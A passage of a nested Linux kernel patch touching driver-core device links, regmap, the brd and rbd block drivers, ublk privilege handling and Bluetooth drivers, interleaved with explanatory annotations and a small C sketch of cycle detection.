++	if (!(flags & DL_FLAG_SYNC_STATE_ONLY)) {
++		device_links_write_lock();
++		if (__fw_devlink_relax_cycles(con, sup_handle)) {
++			__fwnode_link_cycle(link);
++			flags = fw_devlink_get_flags(link->flags);
++			dev_info(con, "Fixed dependency cycle(s) with %pfwf\n",
++				 sup_handle);
++		}
++		device_links_write_unlock();
++	}
++
++	if (sup_handle->flags & FWNODE_FLAG_NOT_DEVICE)
++		sup_dev = fwnode_get_next_parent_dev(sup_handle);
++	else
++		sup_dev = get_dev_from_fwnode(sup_handle);
++
+ 	if (sup_dev) {
+ 		/*
+ 		 * If it's one of those drivers that don't actually bind to
+@@ -1864,71 +2081,34 @@ static int fw_devlink_create_devlink(struct device *con,
+ 		 */
+ 		if (sup_dev->links.status == DL_DEV_NO_DRIVER &&
+ 		    sup_handle->flags & FWNODE_FLAG_INITIALIZED) {
++			dev_dbg(con,
++				"Not linking %pfwf - dev might never probe\n",
++				sup_handle);
+ 			ret = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		/*
+-		 * If this fails, it is due to cycles in device links.  Just
+-		 * give up on this link and treat it as invalid.
+-		 */
+-		if (!device_link_add(con, sup_dev, flags) &&
+-		    !(flags & DL_FLAG_SYNC_STATE_ONLY)) {
+-			dev_info(con, "Fixing up cyclic dependency with %s\n",
+-				 dev_name(sup_dev));
+-			device_links_write_lock();
+-			fw_devlink_relax_cycle(con, sup_dev);
+-			device_links_write_unlock();
+-			device_link_add(con, sup_dev,
+-					FW_DEVLINK_FLAGS_PERMISSIVE);
++		if (con != sup_dev && !device_link_add(con, sup_dev, flags)) {
++			dev_err(con, "Failed to create device link (0x%x) with %s\n",
++				flags, dev_name(sup_dev));
+ 			ret = -EINVAL;
+ 		}
+ 
+ 		goto out;
+ 	}
+ 
+-	/* Supplier that's already initialized without a struct device. */
+-	if (sup_handle->flags & FWNODE_FLAG_INITIALIZED)
+-		return -EINVAL;
+-
+ 	/*
+-	 * DL_FLAG_SYNC_STATE_ONLY doesn't block probing and supports
+-	 * cycles. So cycle detection isn't necessary and shouldn't be
+-	 * done.
++	 * Supplier or supplier's ancestor already initialized without a struct
++	 * device or being probed by a driver.
+ 	 */
+-	if (flags & DL_FLAG_SYNC_STATE_ONLY)
+-		return -EAGAIN;
+-
+-	/*
+-	 * If we can't find the supplier device from its fwnode, it might be
+-	 * due to a cyclic dependency between fwnodes. Some of these cycles can
+-	 * be broken by applying logic. Check for these types of cycles and
+-	 * break them so that devices in the cycle probe properly.
+-	 *
+-	 * If the supplier's parent is dependent on the consumer, then the
+-	 * consumer and supplier have a cyclic dependency. Since fw_devlink
+-	 * can't tell which of the inferred dependencies are incorrect, don't
+-	 * enforce probe ordering between any of the devices in this cyclic
+-	 * dependency. Do this by relaxing all the fw_devlink device links in
+-	 * this cycle and by treating the fwnode link between the consumer and
+-	 * the supplier as an invalid dependency.
+-	 */
+-	sup_dev = fwnode_get_next_parent_dev(sup_handle);
+-	if (sup_dev && device_is_dependent(con, sup_dev)) {
+-		dev_info(con, "Fixing up cyclic dependency with %pfwP (%s)\n",
+-			 sup_handle, dev_name(sup_dev));
+-		device_links_write_lock();
+-		fw_devlink_relax_cycle(con, sup_dev);
+-		device_links_write_unlock();
+-		ret = -EINVAL;
+-	} else {
+-		/*
+-		 * Can't check for cycles or no cycles. So let's try
+-		 * again later.
+-		 */
+-		ret = -EAGAIN;
++	if (fwnode_init_without_drv(sup_handle) ||
++	    fwnode_ancestor_init_without_drv(sup_handle)) {
++		dev_dbg(con, "Not linking %pfwf - might never become dev\n",
++			sup_handle);
++		return -EINVAL;
+ 	}
+ 
++	ret = -EAGAIN;
+ out:
+ 	put_device(sup_dev);
+ 	return ret;
+@@ -1956,7 +2136,6 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 	struct fwnode_link *link, *tmp;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->consumers, s_hook) {
+-		u32 dl_flags = fw_devlink_get_flags();
+ 		struct device *con_dev;
+ 		bool own_link = true;
+ 		int ret;
+@@ -1986,14 +2165,13 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+ 				con_dev = NULL;
+ 			} else {
+ 				own_link = false;
+-				dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 			}
+ 		}
+ 
+ 		if (!con_dev)
+ 			continue;
+ 
+-		ret = fw_devlink_create_devlink(con_dev, fwnode, dl_flags);
++		ret = fw_devlink_create_devlink(con_dev, fwnode, link);
+ 		put_device(con_dev);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+@@ -2013,10 +2191,7 @@ static void __fw_devlink_link_to_consumers(struct device *dev)
+  *
+  * The function creates normal (non-SYNC_STATE_ONLY) device links between @dev
+  * and the real suppliers of @dev. Once these device links are created, the
+- * fwnode links are deleted. When such device links are successfully created,
+- * this function is called recursively on those supplier devices. This is
+- * needed to detect and break some invalid cycles in fwnode links.  See
+- * fw_devlink_create_devlink() for more details.
++ * fwnode links are deleted.
+  *
+  * In addition, it also looks at all the suppliers of the entire fwnode tree
+  * because some of the child devices of @dev that have not been added yet
+@@ -2034,44 +2209,16 @@ static void __fw_devlink_link_to_suppliers(struct device *dev,
+ 	bool own_link = (dev->fwnode == fwnode);
+ 	struct fwnode_link *link, *tmp;
+ 	struct fwnode_handle *child = NULL;
+-	u32 dl_flags;
+-
+-	if (own_link)
+-		dl_flags = fw_devlink_get_flags();
+-	else
+-		dl_flags = FW_DEVLINK_FLAGS_PERMISSIVE;
+ 
+ 	list_for_each_entry_safe(link, tmp, &fwnode->suppliers, c_hook) {
+ 		int ret;
+-		struct device *sup_dev;
+ 		struct fwnode_handle *sup = link->supplier;
+ 
+-		ret = fw_devlink_create_devlink(dev, sup, dl_flags);
++		ret = fw_devlink_create_devlink(dev, sup, link);
+ 		if (!own_link || ret == -EAGAIN)
+ 			continue;
+ 
+ 		__fwnode_link_del(link);
+-
+-		/* If no device link was created, nothing more to do. */
+-		if (ret)
+-			continue;
+-
+-		/*
+-		 * If a device link was successfully created to a supplier, we
+-		 * now need to try and link the supplier to all its suppliers.
+-		 *
+-		 * This is needed to detect and delete false dependencies in
+-		 * fwnode links that haven't been converted to a device link
+-		 * yet. See comments in fw_devlink_create_devlink() for more
+-		 * details on the false dependency.
+-		 *
+-		 * Without deleting these false dependencies, some devices will
+-		 * never probe because they'll keep waiting for their false
+-		 * dependency fwnode links to be converted to device links.
+-		 */
+-		sup_dev = get_dev_from_fwnode(sup);
+-		__fw_devlink_link_to_suppliers(sup_dev, sup_dev->fwnode);
+-		put_device(sup_dev);
+ 	}
+ 
+ 	/*
+@@ -3413,7 +3560,7 @@ int device_add(struct device *dev)
+ 	/* we require the name to be set before, and pass NULL */
+ 	error = kobject_add(&dev->kobj, dev->kobj.parent, NULL);
+ 	if (error) {
+-		glue_dir = get_glue_dir(dev);
++		glue_dir = kobj;
+ 		goto Error;
+ 	}
+ 
+@@ -3513,6 +3660,7 @@ done:
+ 	device_pm_remove(dev);
+ 	dpm_sysfs_remove(dev);
+  DPMError:
++	dev->driver = NULL;
+ 	bus_remove_device(dev);
+  BusError:
+ 	device_remove_attrs(dev);
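Structurally, __fw_devlink_relax_cycles() above is a depth-first walk
that sets FWNODE_FLAG_VISITED on entry and clears it on exit, so the
recursion terminates on cycles while still letting other start points
revisit each node. A generic sketch of that discipline over a toy graph
(only the visited-flag handling mirrors the patch):

#include <stdbool.h>
#include <stdio.h>

#define MAX_DEPS 4

struct node {
	const char *name;
	bool visited;
	struct node *deps[MAX_DEPS];	/* "suppliers" of this node */
};

/* Does any dependency path from 'from' lead back to 'target'? */
static bool reaches(struct node *from, struct node *target)
{
	bool ret = false;
	int i;

	if (!from || from->visited)
		return false;
	if (from == target)
		return true;

	from->visited = true;
	for (i = 0; i < MAX_DEPS && from->deps[i]; i++)
		if (reaches(from->deps[i], target)) {
			printf("cycle edge: %s -> %s\n",
			       from->name, from->deps[i]->name);
			ret = true;
		}
	from->visited = false;		/* allow revisits from elsewhere */

	return ret;
}

int main(void)
{
	struct node con = { "consumer", false, { 0 } };
	struct node sup = { "supplier", false, { &con } };

	/* consumer waits on supplier, but supplier depends on consumer */
	printf("cycle: %s\n", reaches(&sup, &con) ? "yes" : "no");
	return 0;
}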
+diff --git a/drivers/base/physical_location.c b/drivers/base/physical_location.c
+index 87af641cfe1a3..951819e71b4ad 100644
+--- a/drivers/base/physical_location.c
++++ b/drivers/base/physical_location.c
+@@ -24,8 +24,11 @@ bool dev_add_physical_location(struct device *dev)
+ 
+ 	dev->physical_location =
+ 		kzalloc(sizeof(*dev->physical_location), GFP_KERNEL);
+-	if (!dev->physical_location)
++	if (!dev->physical_location) {
++		ACPI_FREE(pld);
+ 		return false;
++	}
++
+ 	dev->physical_location->panel = pld->panel;
+ 	dev->physical_location->vertical_position = pld->vertical_position;
+ 	dev->physical_location->horizontal_position = pld->horizontal_position;
+diff --git a/drivers/base/platform-msi.c b/drivers/base/platform-msi.c
+index 5883e7634a2b7..f37ad34c80ec4 100644
+--- a/drivers/base/platform-msi.c
++++ b/drivers/base/platform-msi.c
+@@ -324,6 +324,7 @@ void platform_msi_device_domain_free(struct irq_domain *domain, unsigned int vir
+ 	struct platform_msi_priv_data *data = domain->host_data;
+ 
+ 	msi_lock_descs(data->dev);
++	msi_domain_depopulate_descs(data->dev, virq, nr_irqs);
+ 	irq_domain_free_irqs_common(domain, virq, nr_irqs);
+ 	msi_free_msi_descs_range(data->dev, virq, virq + nr_irqs - 1);
+ 	msi_unlock_descs(data->dev);
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index 967bcf9d415ea..6097644ebdc51 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -220,13 +220,10 @@ static void genpd_debug_add(struct generic_pm_domain *genpd);
+ 
+ static void genpd_debug_remove(struct generic_pm_domain *genpd)
+ {
+-	struct dentry *d;
+-
+ 	if (!genpd_debugfs_dir)
+ 		return;
+ 
+-	d = debugfs_lookup(genpd->name, genpd_debugfs_dir);
+-	debugfs_remove(d);
++	debugfs_lookup_and_remove(genpd->name, genpd_debugfs_dir);
+ }
+ 
+ static void genpd_update_accounting(struct generic_pm_domain *genpd)
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index d12d669157f24..d2a54eb0efd9b 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1942,6 +1942,8 @@ static int _regmap_bus_reg_write(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_write(map->bus_context, reg, val);
+ }
+ 
+@@ -2840,6 +2842,8 @@ static int _regmap_bus_reg_read(void *context, unsigned int reg,
+ {
+ 	struct regmap *map = context;
+ 
++	reg += map->reg_base;
++	reg >>= map->format.reg_downshift;
+ 	return map->bus->reg_read(map->bus_context, reg, val);
+ }
+ 
+@@ -3231,6 +3235,8 @@ static int _regmap_update_bits(struct regmap *map, unsigned int reg,
+ 		*change = false;
+ 
+ 	if (regmap_volatile(map, reg) && map->reg_update_bits) {
++		reg += map->reg_base;
++		reg >>= map->format.reg_downshift;
+ 		ret = map->reg_update_bits(map->bus_context, reg, mask, val);
+ 		if (ret == 0 && change)
+ 			*change = true;
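[Annotation] The three regmap hunks make the address arithmetic uniform: reg_base and reg_downshift were already applied on the formatted-I/O paths but skipped in the bus reg_read/reg_write/reg_update_bits callbacks, so maps using those callbacks saw raw register numbers. The cure is to funnel every bus access through the same adjustment; a minimal sketch as a hypothetical helper:

static unsigned int demo_adjust_reg(const struct demo_map *map,
				    unsigned int reg)
{
	reg += map->reg_base;		/* fixed offset into the device */
	reg >>= map->reg_downshift;	/* bus addresses wider register units */
	return reg;
}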
+diff --git a/drivers/base/transport_class.c b/drivers/base/transport_class.c
+index ccc86206e5087..09ee2a1e35bbd 100644
+--- a/drivers/base/transport_class.c
++++ b/drivers/base/transport_class.c
+@@ -155,12 +155,27 @@ static int transport_add_class_device(struct attribute_container *cont,
+ 				      struct device *dev,
+ 				      struct device *classdev)
+ {
++	struct transport_class *tclass = class_to_transport_class(cont->class);
+ 	int error = attribute_container_add_class_device(classdev);
+ 	struct transport_container *tcont = 
+ 		attribute_container_to_transport_container(cont);
+ 
+-	if (!error && tcont->statistics)
++	if (error)
++		goto err_remove;
++
++	if (tcont->statistics) {
+ 		error = sysfs_create_group(&classdev->kobj, tcont->statistics);
++		if (error)
++			goto err_del;
++	}
++
++	return 0;
++
++err_del:
++	attribute_container_class_device_del(classdev);
++err_remove:
++	if (tclass->remove)
++		tclass->remove(tcont, dev, classdev);
+ 
+ 	return error;
+ }
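[Annotation] The transport_class fix turns a fire-and-forget error return into a proper unwind: once sysfs_create_group() fails, the class device added just before must be deleted again, and the transport class's remove hook has to run. The general goto-ladder shape, with hypothetical steps:

static int demo_add(struct demo_dev *d)
{
	int error;

	error = demo_step_one(d);
	if (error)
		return error;		/* nothing to undo yet */

	error = demo_step_two(d);
	if (error)
		goto err_undo_one;

	return 0;

err_undo_one:
	demo_undo_step_one(d);		/* unwind in reverse order */
	return error;
}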
+diff --git a/drivers/block/brd.c b/drivers/block/brd.c
+index 20acc4a1fd6de..a8a77a1efe1e3 100644
+--- a/drivers/block/brd.c
++++ b/drivers/block/brd.c
+@@ -78,32 +78,25 @@ static struct page *brd_lookup_page(struct brd_device *brd, sector_t sector)
+ }
+ 
+ /*
+- * Look up and return a brd's page for a given sector.
+- * If one does not exist, allocate an empty page, and insert that. Then
+- * return it.
++ * Insert a new page for a given sector, if one does not already exist.
+  */
+-static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
++static int brd_insert_page(struct brd_device *brd, sector_t sector, gfp_t gfp)
+ {
+ 	pgoff_t idx;
+ 	struct page *page;
+-	gfp_t gfp_flags;
++	int ret = 0;
+ 
+ 	page = brd_lookup_page(brd, sector);
+ 	if (page)
+-		return page;
++		return 0;
+ 
+-	/*
+-	 * Must use NOIO because we don't want to recurse back into the
+-	 * block or filesystem layers from page reclaim.
+-	 */
+-	gfp_flags = GFP_NOIO | __GFP_ZERO | __GFP_HIGHMEM;
+-	page = alloc_page(gfp_flags);
++	page = alloc_page(gfp | __GFP_ZERO | __GFP_HIGHMEM);
+ 	if (!page)
+-		return NULL;
++		return -ENOMEM;
+ 
+-	if (radix_tree_preload(GFP_NOIO)) {
++	if (radix_tree_maybe_preload(gfp)) {
+ 		__free_page(page);
+-		return NULL;
++		return -ENOMEM;
+ 	}
+ 
+ 	spin_lock(&brd->brd_lock);
+@@ -112,16 +105,17 @@ static struct page *brd_insert_page(struct brd_device *brd, sector_t sector)
+ 	if (radix_tree_insert(&brd->brd_pages, idx, page)) {
+ 		__free_page(page);
+ 		page = radix_tree_lookup(&brd->brd_pages, idx);
+-		BUG_ON(!page);
+-		BUG_ON(page->index != idx);
++		if (!page)
++			ret = -ENOMEM;
++		else if (page->index != idx)
++			ret = -EIO;
+ 	} else {
+ 		brd->brd_nr_pages++;
+ 	}
+ 	spin_unlock(&brd->brd_lock);
+ 
+ 	radix_tree_preload_end();
+-
+-	return page;
++	return ret;
+ }
+ 
+ /*
+@@ -170,20 +164,22 @@ static void brd_free_pages(struct brd_device *brd)
+ /*
+  * copy_to_brd_setup must be called before copy_to_brd. It may sleep.
+  */
+-static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n)
++static int copy_to_brd_setup(struct brd_device *brd, sector_t sector, size_t n,
++			     gfp_t gfp)
+ {
+ 	unsigned int offset = (sector & (PAGE_SECTORS-1)) << SECTOR_SHIFT;
+ 	size_t copy;
++	int ret;
+ 
+ 	copy = min_t(size_t, n, PAGE_SIZE - offset);
+-	if (!brd_insert_page(brd, sector))
+-		return -ENOSPC;
++	ret = brd_insert_page(brd, sector, gfp);
++	if (ret)
++		return ret;
+ 	if (copy < n) {
+ 		sector += copy >> SECTOR_SHIFT;
+-		if (!brd_insert_page(brd, sector))
+-			return -ENOSPC;
++		ret = brd_insert_page(brd, sector, gfp);
+ 	}
+-	return 0;
++	return ret;
+ }
+ 
+ /*
+@@ -256,20 +252,26 @@ static void copy_from_brd(void *dst, struct brd_device *brd,
+  * Process a single bvec of a bio.
+  */
+ static int brd_do_bvec(struct brd_device *brd, struct page *page,
+-			unsigned int len, unsigned int off, enum req_op op,
++			unsigned int len, unsigned int off, blk_opf_t opf,
+ 			sector_t sector)
+ {
+ 	void *mem;
+ 	int err = 0;
+ 
+-	if (op_is_write(op)) {
+-		err = copy_to_brd_setup(brd, sector, len);
++	if (op_is_write(opf)) {
++		/*
++		 * Must use NOIO because we don't want to recurse back into the
++		 * block or filesystem layers from page reclaim.
++		 */
++		gfp_t gfp = opf & REQ_NOWAIT ? GFP_NOWAIT : GFP_NOIO;
++
++		err = copy_to_brd_setup(brd, sector, len, gfp);
+ 		if (err)
+ 			goto out;
+ 	}
+ 
+ 	mem = kmap_atomic(page);
+-	if (!op_is_write(op)) {
++	if (!op_is_write(opf)) {
+ 		copy_from_brd(mem + off, brd, sector, len);
+ 		flush_dcache_page(page);
+ 	} else {
+@@ -298,8 +300,12 @@ static void brd_submit_bio(struct bio *bio)
+ 				(len & (SECTOR_SIZE - 1)));
+ 
+ 		err = brd_do_bvec(brd, bvec.bv_page, len, bvec.bv_offset,
+-				  bio_op(bio), sector);
++				  bio->bi_opf, sector);
+ 		if (err) {
++			if (err == -ENOMEM && bio->bi_opf & REQ_NOWAIT) {
++				bio_wouldblock_error(bio);
++				return;
++			}
+ 			bio_io_error(bio);
+ 			return;
+ 		}
+@@ -412,6 +418,7 @@ static int brd_alloc(int i)
+ 	/* Tell the block layer that this is not a rotational device */
+ 	blk_queue_flag_set(QUEUE_FLAG_NONROT, disk->queue);
+ 	blk_queue_flag_clear(QUEUE_FLAG_ADD_RANDOM, disk->queue);
++	blk_queue_flag_set(QUEUE_FLAG_NOWAIT, disk->queue);
+ 	err = add_disk(disk);
+ 	if (err)
+ 		goto out_cleanup_disk;
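[Annotation] The brd hunks above are a compact example of wiring REQ_NOWAIT support into a bio-based driver: the allocation mode is derived from the bio's opf flags, and an -ENOMEM under REQ_NOWAIT is completed as "would block" rather than as an I/O error. A minimal sketch of that dispatch logic, where demo_do_io() is a hypothetical stand-in for the driver's per-bvec work:

static void demo_submit_bio(struct bio *bio)
{
	/*
	 * Nowait bios must not sleep waiting for memory; everything else
	 * uses GFP_NOIO so reclaim cannot recurse into the block layer.
	 */
	gfp_t gfp = (bio->bi_opf & REQ_NOWAIT) ? GFP_NOWAIT : GFP_NOIO;
	int err = demo_do_io(bio, gfp);		/* hypothetical helper */

	if (err == -ENOMEM && (bio->bi_opf & REQ_NOWAIT)) {
		bio_wouldblock_error(bio);	/* submitter may retry blocking */
		return;
	}
	if (err) {
		bio_io_error(bio);
		return;
	}
	bio_endio(bio);
}

Note the queue must also advertise QUEUE_FLAG_NOWAIT, as the final brd hunk does, or REQ_NOWAIT bios never reach the driver.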
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 04453f4a319cb..60aed196a2e54 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -5292,8 +5292,7 @@ static void rbd_dev_release(struct device *dev)
+ 		module_put(THIS_MODULE);
+ }
+ 
+-static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+-					   struct rbd_spec *spec)
++static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+@@ -5338,9 +5337,6 @@ static struct rbd_device *__rbd_dev_create(struct rbd_client *rbdc,
+ 	rbd_dev->dev.parent = &rbd_root_dev;
+ 	device_initialize(&rbd_dev->dev);
+ 
+-	rbd_dev->rbd_client = rbdc;
+-	rbd_dev->spec = spec;
+-
+ 	return rbd_dev;
+ }
+ 
+@@ -5353,12 +5349,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ {
+ 	struct rbd_device *rbd_dev;
+ 
+-	rbd_dev = __rbd_dev_create(rbdc, spec);
++	rbd_dev = __rbd_dev_create(spec);
+ 	if (!rbd_dev)
+ 		return NULL;
+ 
+-	rbd_dev->opts = opts;
+-
+ 	/* get an id and fill in device name */
+ 	rbd_dev->dev_id = ida_simple_get(&rbd_dev_id_ida, 0,
+ 					 minor_to_rbd_dev_id(1 << MINORBITS),
+@@ -5375,6 +5369,10 @@ static struct rbd_device *rbd_dev_create(struct rbd_client *rbdc,
+ 	/* we have a ref from do_rbd_add() */
+ 	__module_get(THIS_MODULE);
+ 
++	rbd_dev->rbd_client = rbdc;
++	rbd_dev->spec = spec;
++	rbd_dev->opts = opts;
++
+ 	dout("%s rbd_dev %p dev_id %d\n", __func__, rbd_dev, rbd_dev->dev_id);
+ 	return rbd_dev;
+ 
+@@ -6736,7 +6734,7 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 		goto out_err;
+ 	}
+ 
+-	parent = __rbd_dev_create(rbd_dev->rbd_client, rbd_dev->parent_spec);
++	parent = __rbd_dev_create(rbd_dev->parent_spec);
+ 	if (!parent) {
+ 		ret = -ENOMEM;
+ 		goto out_err;
+@@ -6746,8 +6744,8 @@ static int rbd_dev_probe_parent(struct rbd_device *rbd_dev, int depth)
+ 	 * Images related by parent/child relationships always share
+ 	 * rbd_client and spec/parent_spec, so bump their refcounts.
+ 	 */
+-	__rbd_get_client(rbd_dev->rbd_client);
+-	rbd_spec_get(rbd_dev->parent_spec);
++	parent->rbd_client = __rbd_get_client(rbd_dev->rbd_client);
++	parent->spec = rbd_spec_get(rbd_dev->parent_spec);
+ 
+ 	__set_bit(RBD_DEV_FLAG_READONLY, &parent->flags);
+ 
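[Annotation] The rbd reordering is a reference-lifetime fix worth generalizing: when refcounted members are assigned before the last failure point, every error path has to remember to drop them; assigning them after the last failure point makes the unwind trivial. A schematic sketch with hypothetical names:

static struct child *child_create(struct parent *p)
{
	struct child *c = kzalloc(sizeof(*c), GFP_KERNEL);

	if (!c)
		return NULL;

	if (demo_get_id(c) < 0) {		/* hypothetical failure point */
		kfree(c);			/* nothing extra to drop yet */
		return NULL;
	}

	/* take shared references only after the last failure point */
	c->owner = demo_owner_get(p->owner);	/* hypothetical refcount getter */
	return c;
}

The parent-probe hunk applies the same idea: the get and the assignment into the new object happen in one statement, so a reference can never be taken without being owned.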
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 6368b56eacf11..4aec9be0ab77e 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -159,7 +159,7 @@ struct ublk_device {
+ 
+ 	struct completion	completion;
+ 	unsigned int		nr_queues_ready;
+-	atomic_t		nr_aborted_queues;
++	unsigned int		nr_privileged_daemon;
+ 
+ 	/*
+ 	 * Our ubq->daemon may be killed without any notification, so
+@@ -1179,6 +1179,9 @@ static void ublk_mark_io_ready(struct ublk_device *ub, struct ublk_queue *ubq)
+ 		ubq->ubq_daemon = current;
+ 		get_task_struct(ubq->ubq_daemon);
+ 		ub->nr_queues_ready++;
++
++		if (capable(CAP_SYS_ADMIN))
++			ub->nr_privileged_daemon++;
+ 	}
+ 	if (ub->nr_queues_ready == ub->dev_info.nr_hw_queues)
+ 		complete_all(&ub->completion);
+@@ -1203,6 +1206,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	u32 cmd_op = cmd->cmd_op;
+ 	unsigned tag = ub_cmd->tag;
+ 	int ret = -EINVAL;
++	struct request *req;
+ 
+ 	pr_devel("%s: received: cmd op %d queue %d tag %d result %d\n",
+ 			__func__, cmd->cmd_op, ub_cmd->q_id, tag,
+@@ -1253,8 +1257,8 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		 */
+ 		if (io->flags & UBLK_IO_FLAG_OWNED_BY_SRV)
+ 			goto out;
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		/* FETCH_RQ has to provide IO buffer if NEED GET DATA is not enabled */
++		if (!ub_cmd->addr && !ublk_need_get_data(ubq))
+ 			goto out;
+ 		io->cmd = cmd;
+ 		io->flags |= UBLK_IO_FLAG_ACTIVE;
+@@ -1263,8 +1267,12 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 		ublk_mark_io_ready(ub, ubq);
+ 		break;
+ 	case UBLK_IO_COMMIT_AND_FETCH_REQ:
+-		/* FETCH_RQ has to provide IO buffer */
+-		if (!ub_cmd->addr)
++		req = blk_mq_tag_to_rq(ub->tag_set.tags[ub_cmd->q_id], tag);
++		/*
++		 * COMMIT_AND_FETCH_REQ has to provide IO buffer if NEED GET DATA is
++		 * not enabled or it is Read IO.
++		 */
++		if (!ub_cmd->addr && (!ublk_need_get_data(ubq) || req_op(req) == REQ_OP_READ))
+ 			goto out;
+ 		if (!(io->flags & UBLK_IO_FLAG_OWNED_BY_SRV))
+ 			goto out;
+@@ -1535,6 +1543,10 @@ static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
+ 	if (ret)
+ 		goto out_put_disk;
+ 
++	/* don't probe partitions if any one ubq daemon is untrusted */
++	if (ub->nr_privileged_daemon != ub->nr_queues_ready)
++		set_bit(GD_SUPPRESS_PART_SCAN, &disk->state);
++
+ 	get_device(&ub->cdev_dev);
+ 	ret = add_disk(disk);
+ 	if (ret) {
+@@ -1936,6 +1948,7 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	/* set to NULL, otherwise new ubq_daemon cannot mmap the io_cmd_buf */
+ 	ub->mm = NULL;
+ 	ub->nr_queues_ready = 0;
++	ub->nr_privileged_daemon = 0;
+ 	init_completion(&ub->completion);
+ 	ret = 0;
+  out_unlock:
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 2ad4efdd9e40b..18bc947187115 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -64,6 +64,7 @@ static struct usb_driver btusb_driver;
+ #define BTUSB_INTEL_BROKEN_SHUTDOWN_LED	BIT(24)
+ #define BTUSB_INTEL_BROKEN_INITIAL_NCMD BIT(25)
+ #define BTUSB_INTEL_NO_WBS_SUPPORT	BIT(26)
++#define BTUSB_ACTIONS_SEMI		BIT(27)
+ 
+ static const struct usb_device_id btusb_table[] = {
+ 	/* Generic Bluetooth USB device */
+@@ -492,6 +493,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x8087, 0xe0, 0x01, 0x01),
+ 	  .driver_info = BTUSB_IGNORE },
+ 
++	/* Realtek 8821CE Bluetooth devices */
++	{ USB_DEVICE(0x13d3, 0x3529), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++
+ 	/* Realtek 8822CE Bluetooth devices */
+ 	{ USB_DEVICE(0x0bda, 0xb00c), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+@@ -566,6 +571,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0489, 0xe0e0), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x0489, 0xe0f2), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 	{ USB_DEVICE(0x04ca, 0x3802), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
+@@ -677,6 +685,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x0cb5, 0xc547), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 
++	/* Actions Semiconductor ATS2851 based devices */
++	{ USB_DEVICE(0x10d7, 0xb012), .driver_info = BTUSB_ACTIONS_SEMI },
++
+ 	/* Silicon Wave based devices */
+ 	{ USB_DEVICE(0x0c10, 0x0000), .driver_info = BTUSB_SWAVE },
+ 
+@@ -4098,6 +4109,11 @@ static int btusb_probe(struct usb_interface *intf,
+ 		set_bit(BTUSB_USE_ALT3_FOR_WBS, &data->flags);
+ 	}
+ 
++	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
++		/* Support is advertised, but not implemented */
++		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++	}
++
+ 	if (!reset)
+ 		set_bit(HCI_QUIRK_RESET_ON_CLOSE, &hdev->quirks);
+ 
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index bbe9cf1cae27f..d331772809d56 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -1588,10 +1588,11 @@ static bool qca_wakeup(struct hci_dev *hdev)
+ 	struct hci_uart *hu = hci_get_drvdata(hdev);
+ 	bool wakeup;
+ 
+-	/* UART driver handles the interrupt from BT SoC.So we need to use
+-	 * device handle of UART driver to get the status of device may wakeup.
++	/* BT SoC attached through the serial bus is handled by the serdev driver.
++	 * So we need to use the device handle of the serdev driver to get
++	 * the wakeup status of the device.
+ 	 */
+-	wakeup = device_may_wakeup(hu->serdev->ctrl->dev.parent);
++	wakeup = device_may_wakeup(&hu->serdev->ctrl->dev);
+ 	bt_dev_dbg(hu->hdev, "wakeup status : %d", wakeup);
+ 
+ 	return wakeup;
